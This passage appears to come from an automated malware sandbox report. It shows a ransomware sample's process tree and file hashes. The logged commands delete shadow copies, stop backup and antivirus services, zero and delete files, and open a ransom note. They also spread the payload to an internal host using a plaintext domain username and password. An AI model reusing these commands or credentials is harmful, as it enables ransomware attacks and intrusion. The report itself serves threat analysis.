C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4932
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4792
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1436
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:2852
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1292
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2672
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1300
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1492
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1716
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1096
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4284
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4012
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1484
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:116
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.127.0.77 /USER:SHJPOLICE\amer !Omar20122⤵PID:4648
-
-
C:\Users\Admin\AppData\Local\Temp\frrto0ds.exe"C:\Users\Admin\AppData\Local\Temp\frrto0ds.exe" \10.127.0.77 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:380
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
PID:3720
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:4708
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:1824
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:4744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\7ea4ed64bd51eb40865c5ede7da7cf980a464db8087d95fec5a83885352c88b2.exe2⤵PID:1396
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:572
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵PID:3624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:1884
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
1KB
MD5171a7150fbd0c4c406488858914b9185
SHA1e3debbe92d1214cd5ffddd8d433c3a0917759a0d
SHA256bb1969f015a2d3076ce63e54b1c18f4c9a2cd5b9c3280b40e4321e7035ad581b
SHA512325d535d80831db0a8faeb7e38e62b9d13e286059bea817a9c0388d9af551714b4360cdef1d88f7e31f6bc631d0ff95095b31090682616b25cc97832c3726ea8